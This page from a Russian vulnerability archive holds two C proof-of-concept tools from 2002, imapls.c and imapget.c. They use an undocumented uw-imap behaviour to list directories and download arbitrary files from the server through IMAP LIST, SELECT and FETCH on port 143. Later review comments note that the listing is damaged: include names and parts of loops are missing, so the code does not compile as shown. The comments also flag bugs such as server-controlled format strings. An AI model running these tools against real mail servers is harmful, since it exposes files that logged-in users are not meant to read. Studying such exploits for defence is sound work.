imapls.c (позволяет просматривать содержание директории) / Уязвимости / Недокументированная возможность в uw-imap позволяет доступ к файлам на сервере /

/*
 * NOTE(review): this listing appears to have lost every "<...>" span when the
 * page was extracted. The header names after each #include are gone, and the
 * loop header of read_reply() is cut between "i" and "= 2" in both programs.
 * Neither program compiles as shown; the code tokens below are kept exactly
 * as they appear on the page and only comments and layout were added.
 *
 * Per the page title, the server-side issue is that uw-imap lets a logged-in
 * user reach files on the server. Both clients below only issue ordinary
 * IMAP commands (LOGIN, LIST, SELECT, FETCH, LOGOUT) over port 143.
 */

/*
 imapls.c
 (c) 2002 ZARAZA 3APA3A@security.nnov.ru

             /\_/\
            { . . }     |\
       +--oQQo->{ ^ }<-----+ \
       |Here was  U  3APA3A   }
       +-------------o66o--+ /
                            |/
*/

/* Eight includes; the header names were stripped by the page extraction. */
#include
#include
#include
#include
#include
#include
#include
#include

/* gotit, size and port are not referenced anywhere in this listing. */
int gotit=0;
/* Scratch buffer used by main() to build the commands sent to the server. */
char buf[4100];
long size;
int port;

/* Print the command-line synopsis to stderr and exit with status 1. */
void usage( char* progname) {
    fprintf(stderr, "Usage: %s host list_mask\n", progname);
    exit(1);
}

/*
 * Resolve hostname with gethostbyname() and return the first address.
 * Exits with status -3 when the name cannot be resolved.
 *
 * NOTE(review): the address is read through a u_long pointer. Where u_long is
 * wider than the address (hp->h_length), this reads past the address bytes;
 * copying h_length bytes with memcpy() would avoid that.
 */
u_long lookup(char *hostname) {
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Could not resolve %s.\n", hostname);
        exit(-3);
    }
    return *(u_long *)hp->h_addr;
}

#define PGBUFSIZE 10240
/* Descriptor and line buffer shared by pgetsinit(), pgets() and send_command(). */
int pgf;
char pgbuf[PGBUFSIZE];

/* Remember the descriptor that pgets() reads from and send_command() writes to. */
void pgetsinit (int fd) {
    pgf = fd;
}

/*
 * Read one line from pgf into pgbuf, one byte per read() call, stopping at
 * '\n', at a read() return of 0, or after PGBUFSIZE-1 bytes.
 * Stores i+1 in *len, NUL-terminates at pgbuf[i+1], and returns pgbuf, or
 * NULL when i is 0 (nothing read, or a line consisting only of '\n').
 *
 * NOTE(review): when the loop runs to its limit, i == PGBUFSIZE-1 and the
 * terminator is written to pgbuf[PGBUFSIZE], one byte past the array. The
 * peer controls the line length, so this is reachable from the network.
 * NOTE(review): read() returning -1 is non-zero, so an error is not treated
 * as end of input; the loop then tests whatever pgbuf[i] already held.
 * NOTE(review): on a read() return of 0, *len still counts the byte at
 * pgbuf[i] even though it was not read.
 */
char * pgets (int * len) {
    int i;

    for (i=0; i<(PGBUFSIZE-1); i++) {
        if(!read(pgf, pgbuf+i, 1) || pgbuf[i] == '\n')break;
    }
    *len = i+1;
    pgbuf[i+1]=0;
    return (i)?pgbuf:NULL;
}

/*
 * Read server lines and route them: LIST results go to stdout, status and
 * other untagged lines go to stderr.
 * Returns 1 when s is NULL after the loop, or when maxlines is 0 and the last
 * line does not start with "abc OK"; returns 0 otherwise.
 *
 * NOTE(review): the for-header below is damaged. The text between "i" and
 * "= 2" is missing from the page, including the rest of the loop condition,
 * the opening brace of the loop body and the start of the if that strips
 * CRLF. How s and n are assigned cannot be seen from here.
 */
int read_reply(int maxlines){
    int i, n;
    char *s;
    int data = 0;

    for (i=0; (!maxlines || i= 2 && s[n-1] == '\n' && s[n-2] == '\r') {
            /* Turn a trailing "\r\n" into "\n" and shorten the length by one. */
            s[n-2] = '\n';
            s[n-1] = 0;
            n--;
        }
        /* Only the first 3 characters ("abc") are compared, not the space. */
        if( !data && !strncmp(s, "abc ", 3)) {
            fprintf(stderr, "%s", s);
            break;
        }
        if(*s == '*') {
            /* Only the first 6 characters ("* LIST") are compared. */
            if (!strncmp (s, "* LIST ", 6)){
                /* Print what follows the 5-character ` "/" ` delimiter field. */
                if((s=strstr(s, " \"/\" "))) {
                    s+=5;
                    write(1, s, strlen(s));
                }
                else s="";
            }
            /*
             * NOTE(review): s is a line received from the server and is used
             * as the format string here, so '%' sequences sent by the peer
             * are interpreted by fprintf(). fprintf(stderr, "%s", s), as used
             * a few lines above, avoids that.
             */
            else fprintf(stderr, s);
        }
        else if (*s == ')') data = 0;
        else {
            /* Any other line is copied to stdout and marks data mode. */
            data = 1;
            write(1, s, n);
        }
    }
    if (!s) fprintf(stderr, "\npgets() failed\n");
    if (!s || (!maxlines && strncmp(s, "abc OK", 6))) return 1;
    return 0;
}

/*
 * Write command to the connection (pgf); echo it to stderr first when show
 * is non-zero. The return value of write() is not checked.
 */
void send_command (char * command, int show) {
    if(show)fprintf(stderr, ">> %s", command);
    write(pgf, command, strlen(command));
}

/*
 * imapls entry point: connect to argv[1] on TCP port 143, log in with a login
 * read from stdin and a password from getpass(), send LIST with reference "/"
 * and argv[2] as the mask, then LOGOUT.
 * Exit codes: 1 socket, 2 connect, 3 no greeting, 4 login rejected,
 * 6 LIST or LOGOUT failed (6 is used for both).
 */
int main(int argc, char* argv[]){
    /* NOTE(review): sin is not zeroed before its fields are filled in. */
    struct sockaddr_in sin;
    int sock;
    char buff[64];

    if(argc!=3) usage(argv[0]);
    sin.sin_addr.s_addr = lookup(argv[1]);
    sin.sin_family = AF_INET;
    /* Port is fixed at 143; no TLS negotiation is visible, so the LOGIN
       command below travels in cleartext. */
    sin.sin_port = htons(143);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
        /* The page had a line break inside this literal; it is rejoined here. */
        fprintf(stderr, "Error: Unable to allocate socket\n");
        return 1;
    }
    if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){
        fprintf(stderr, "Unable to connect %s\n", argv[1]);
        return 2;
    }
    pgetsinit(sock);
    /* Read one line: the server greeting. */
    if (read_reply(1)) {
        fprintf(stderr, "\nSorry, nobody home\n");
        return 3;
    }
    /* The extra buf argument has no matching conversion in the format. */
    fprintf(stderr, " Login: ", buf);
    /*
     * NOTE(review): the fgets() result is not checked, and the last character
     * is dropped unconditionally. An empty string makes strlen(buff)-1 wrap
     * and write outside buff; input without a trailing newline loses a real
     * character.
     */
    fgets(buff, 64, stdin);
    buff[strlen(buff)-1] = 0;
    /*
     * NOTE(review): login and password are inserted without IMAP quoting, and
     * the snprintf() result is not checked for truncation at 1024 bytes.
     */
    snprintf(buf, 1024, "abc LOGIN %s %s\r\n", buff, getpass(" Password: "));
    /* show=0 keeps the password out of the stderr echo. */
    send_command(buf, 0);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong password\n");
        return 4;
    }
    /* argv[2] is placed between double quotes without escaping. */
    snprintf(buf, 1024, "abc LIST \"/\" \"%s\"\r\n", argv[2]);
    send_command(buf, 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong administrator\n");
        return 6;
    }
    send_command("abc LOGOUT\r\n", 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nHe didn't even said doodBYE\n");
        return 6;
    }
    /* The socket is closed only on this success path. */
    close(sock);
    return 0;
}

imapget.c (позволяет загружать файлы через imap-uw)

/*
 imapget.c
 (c) 2002 ZARAZA 3APA3A@security.nnov.ru

             /\_/\
            { . . }     |\
       +--oQQo->{ ^ }<-----+ \
       |Here was  U  3APA3A   }
       +-------------o66o--+ /
                            |/
*/

/* Eight includes; the header names were stripped by the page extraction. */
#include
#include
#include
#include
#include
#include
#include
#include

/* gotit, size and port are not referenced anywhere in this listing. */
int gotit=0;
/* Scratch buffer: command text in main(), decoded base64 in read_reply(). */
char buf[4100];
long size;
int port;

/* Print the command-line synopsis to stderr and exit with status 1. */
void usage( char* progname) {
    fprintf(stderr, "Usage: %s host filename\n", progname);
    exit(1);
}

/* Marker for characters that are not part of the base64 alphabet. */
#define BAD -1
/*
 * Base64 value for each of the 128 ASCII codes: '+' is 62, '/' is 63,
 * '0'-'9' are 52-61, 'A'-'Z' are 0-25 and 'a'-'z' are 26-51.
 *
 * NOTE(review): the table is plain char. Where plain char is unsigned, BAD
 * is stored as a positive value and the "== BAD" tests in de64() never match.
 */
static const char base64val[] = {
    /*   0- 15 */ BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
    /*  16- 31 */ BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
    /*  32- 47 */ BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
    /*  48- 63 */ 52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
    /*  64- 79 */ BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
    /*  80- 95 */ 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD,
    /*  96-111 */ BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    /* 112-127 */ 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD
};
/* Table lookup guarded by isascii(); the argument is evaluated twice.
   The page had a line break inside this macro; it is rejoined here. */
#define DECODE64(c) (isascii(c) ? base64val[c] : BAD)

/*
 * Decode base64 text from in to out, one 4-character group at a time.
 * A leading "+ " is skipped; input starting with '\r' yields 0.
 * Decoding stops at NUL, at '\r', after a group ending in '=', or when the
 * maxlen budget (reduced by 4 per group) drops below 4.
 * Returns the number of bytes written to out, or -1 on an invalid character.
 *
 * NOTE(review): maxlen limits the number of input groups, not the bytes
 * written; out must hold about 3 bytes for every 4 counted by maxlen.
 */
int de64 (const char *in, char *out, int maxlen) {
    int len = 0;
    register unsigned char digit1, digit2, digit3, digit4;

    if (in[0] == '+' && in[1] == ' ')
        in += 2;
    if (*in == '\r')
        return(0);

    do {
        /* Validate all four characters before writing anything; '=' is
           accepted only in the third and fourth positions. */
        digit1 = in[0];
        if (DECODE64(digit1) == BAD)
            return(-1);
        digit2 = in[1];
        if (DECODE64(digit2) == BAD)
            return(-1);
        digit3 = in[2];
        if (digit3 != '=' && DECODE64(digit3) == BAD)
            return(-1);
        digit4 = in[3];
        if (digit4 != '=' && DECODE64(digit4) == BAD)
            return(-1);
        in += 4;
        /* One to three output bytes, depending on padding. */
        *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4);
        ++len;
        if (digit3 != '=') {
            *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2);
            ++len;
            if (digit4 != '=') {
                *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4);
                ++len;
            }
        }
    } while (*in && *in != '\r' && digit4 != '=' && (maxlen-=4) >= 4);

    return (len);
}

/*
 * Resolve hostname with gethostbyname() and return the first address.
 * Exits with status -3 when the name cannot be resolved.
 *
 * NOTE(review): the address is read through a u_long pointer. Where u_long is
 * wider than the address (hp->h_length), this reads past the address bytes.
 */
u_long lookup(char *hostname) {
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Could not resolve %s.\n", hostname);
        exit(-3);
    }
    return *(u_long *)hp->h_addr;
}

#define PGBUFSIZE 10240
/* Descriptor and line buffer shared by pgetsinit(), pgets() and send_command(). */
int pgf;
char pgbuf[PGBUFSIZE];

/* Remember the descriptor that pgets() reads from and send_command() writes to. */
void pgetsinit (int fd) {
    pgf = fd;
}

/*
 * Read one line from pgf into pgbuf, one byte per read() call, stopping at
 * '\n', at a read() return of 0, or after PGBUFSIZE-1 bytes.
 * Stores i+1 in *len, NUL-terminates at pgbuf[i+1], and returns pgbuf, or
 * NULL when i is 0.
 *
 * NOTE(review): when the loop runs to its limit, i == PGBUFSIZE-1 and the
 * terminator is written to pgbuf[PGBUFSIZE], one byte past the array. The
 * peer controls the line length, so this is reachable from the network.
 * NOTE(review): read() returning -1 is non-zero, so an error is not treated
 * as end of input.
 */
char * pgets (int * len) {
    int i;

    for (i=0; i<(PGBUFSIZE-1); i++) {
        if(!read(pgf, pgbuf+i, 1) || pgbuf[i] == '\n')break;
    }
    *len = i+1;
    pgbuf[i+1]=0;
    return (i)?pgbuf:NULL;
}

/* Set by read_reply() when the BODYSTRUCTURE response contains "BASE64". */
int b64 = 0;

/*
 * Read server lines, echo them to stderr, pick the transfer encoding from the
 * BODYSTRUCTURE response and copy the BODY[TEXT] literal to stdout, decoding
 * it first when b64 is set.
 * Returns 1 when s is NULL after the loop, or when maxlines is 0 and the last
 * line does not start with "abc OK"; returns 0 otherwise.
 *
 * NOTE(review): the for-header below is damaged. The text between "i" and
 * "= 2" is missing from the page, including the rest of the loop condition,
 * the opening brace of the loop body and the start of the if that strips
 * CRLF. How s and n are assigned cannot be seen from here.
 */
int read_reply(int maxlines){
    int i, n;
    char *s;
    int data = 0;

    for (i=0; (!maxlines || i= 2 && s[n-1] == '\n' && s[n-2] == '\r') {
            /* Turn a trailing "\r\n" into "\n" and shorten the length by one. */
            s[n-2] = '\n';
            s[n-1] = 0;
            n--;
        }
        /*
         * NOTE(review): every received line is used as the format string, so
         * '%' sequences sent by the server are interpreted by fprintf().
         * fprintf(stderr, "%s", s) or fputs(s, stderr) avoids that.
         */
        fprintf(stderr, s);
        /* Only the first 3 characters ("abc") are compared, not the space. */
        if( !strncmp(s, "abc ", 3)) {
            break;
        }
        if(*s == '*') {
            if (!strncmp(s, "* 1 FETCH (BODYSTRUCTURE", 24)) {
                if(strstr(s, "\"BASE64\"")) {
                    fprintf(stderr, "fetching as base64\n");
                    b64 = 1;
                }
                else {
                    fprintf(stderr, "fetching as text\n");
                    b64 = 0;
                }
            }
            else if (!strncmp(s, "* 1 FETCH (BODY[TEXT] {", 23)) {
                /* Literal size announced by the server; atoi() reports no
                   errors and the value is not range-checked. */
                data = atoi(s + 23);
                fprintf(stderr, "fetching %d bytes of data\n", data);
                while(data > 0) {
                    if(!(s = pgets(&n)))break;
                    /* Never consume more than the announced literal size. */
                    if(n>data)n=data;
                    data-=n;
                    if(b64 == 1) {
                        /*
                         * NOTE(review): de64() returns -1 on invalid input,
                         * and that value is passed to write() as the length
                         * without a check.
                         */
                        n = de64(s, buf, 1024);
                        write(1, buf, n);
                    }
                    else write(1, s, n);
                }
            }
        }
    }
    if (!s) fprintf(stderr, "\npgets() failed\n");
    if (!s || (!maxlines && strncmp(s, "abc OK", 6))) return 1;
    return 0;
}

/*
 * Write command to the connection (pgf); echo it to stderr first when show
 * is non-zero. The return value of write() is not checked.
 */
void send_command (char * command, int show) {
    if(show)fprintf(stderr, ">> %s", command);
    write(pgf, command, strlen(command));
}

/*
 * imapget entry point: connect to argv[1] on TCP port 143, log in with a
 * login read from stdin and a password from getpass(), SELECT argv[2], fetch
 * BODYSTRUCTURE and BODY[TEXT] of message 1, then LOGOUT.
 * Exit codes: 1 socket, 2 connect, 3 no greeting, 4 login rejected,
 * 5 SELECT failed, 6 either FETCH or LOGOUT failed.
 */
int main(int argc, char* argv[]){
    /* NOTE(review): sin is not zeroed before its fields are filled in. */
    struct sockaddr_in sin;
    int sock;
    char buff[64];

    if(argc!=3) usage(argv[0]);
    sin.sin_addr.s_addr = lookup(argv[1]);
    sin.sin_family = AF_INET;
    /* Port is fixed at 143; no TLS negotiation is visible, so the LOGIN
       command below travels in cleartext. */
    sin.sin_port = htons(143);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
        fprintf(stderr, "Error: Unable to allocate socket\n");
        return 1;
    }
    if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){
        fprintf(stderr, "Unable to connect %s\n", argv[1]);
        return 2;
    }
    pgetsinit(sock);
    /* Read one line: the server greeting. */
    if (read_reply(1)) {
        fprintf(stderr, "\nSorry, nobody home\n");
        return 3;
    }
    /* The extra buf argument has no matching conversion in the format. */
    fprintf(stderr, " Login: ", buf);
    /*
     * NOTE(review): the fgets() result is not checked, and the last character
     * is dropped unconditionally. An empty string makes strlen(buff)-1 wrap
     * and write outside buff; input without a trailing newline loses a real
     * character.
     */
    fgets(buff, 64, stdin);
    buff[strlen(buff)-1] = 0;
    /*
     * NOTE(review): login and password are inserted without IMAP quoting, and
     * the snprintf() result is not checked for truncation at 1024 bytes.
     */
    snprintf(buf, 1024, "abc LOGIN %s %s\r\n", buff, getpass(" Password: "));
    /* show=0 keeps the password out of the stderr echo. */
    send_command(buf, 0);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong password\n");
        return 4;
    }
    /* argv[2] is inserted as the mailbox name without quoting. */
    snprintf(buf, 4000, "abc SELECT %s\r\n", argv[2]);
    send_command(buf, 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong pocket\n");
        return 5;
    }
    /* First FETCH sets b64 inside read_reply(); the second transfers the body. */
    send_command("abc FETCH 1:1 (BODYSTRUCTURE)\r\n", 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong administrator\n");
        return 6;
    }
    send_command("abc FETCH 1:1 (BODY[TEXT])\r\n", 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nSorry, wrong administrator\n");
        return 6;
    }
    send_command("abc LOGOUT\r\n", 1);
    if (read_reply(0)) {
        fprintf(stderr, "\nHe didn't even said doodBYE\n");
        return 6;
    }
    /* The socket is closed only on this success path. */
    close(sock);
    return 0;
}